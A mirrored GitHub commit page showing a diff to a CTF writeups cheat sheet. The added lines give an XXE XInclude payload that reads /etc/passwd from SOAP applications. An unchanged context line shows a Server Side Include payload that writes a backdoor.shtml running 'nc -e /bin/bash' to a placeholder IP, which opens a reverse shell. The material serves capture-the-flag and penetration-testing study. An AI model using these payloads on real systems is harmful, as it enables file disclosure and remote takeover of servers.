mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2024-11-22 12:03:03 +00:00
Update Cheat Sheet.md
This commit is contained in:
ARZ
GitHub
parent
04b4585956
commit
31f1cacbb9
1 changed files with 8 additions and 0 deletions
|
|
@ -558,6 +558,14 @@ Also to check `/etc/nginx/sites-available/default`
|
|||
|
||||
To see list of processes running on the system we can read this file `/proc/sched_debug`
|
||||
|
||||
### XXE - XIncludes Attack
|
||||
|
||||
We can use XInclude when SOAP is being used in an application and we can't introduce DTD , so we'll have to replace a value of a paramter with <br/>
|
||||
```
|
||||
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
|
||||
<xi:include parse="text" href="file:///etc/passwd"/></foo>
|
||||
```
|
||||
|
||||
### SSI (Server Side Includes)
|
||||
|
||||
` echo '<!--#exec cmd="nc -e /bin/bash IP PORT" -->' > backdoor.shtml`
|
||||
|
|
|
|||
Loading…
Reference in a new issue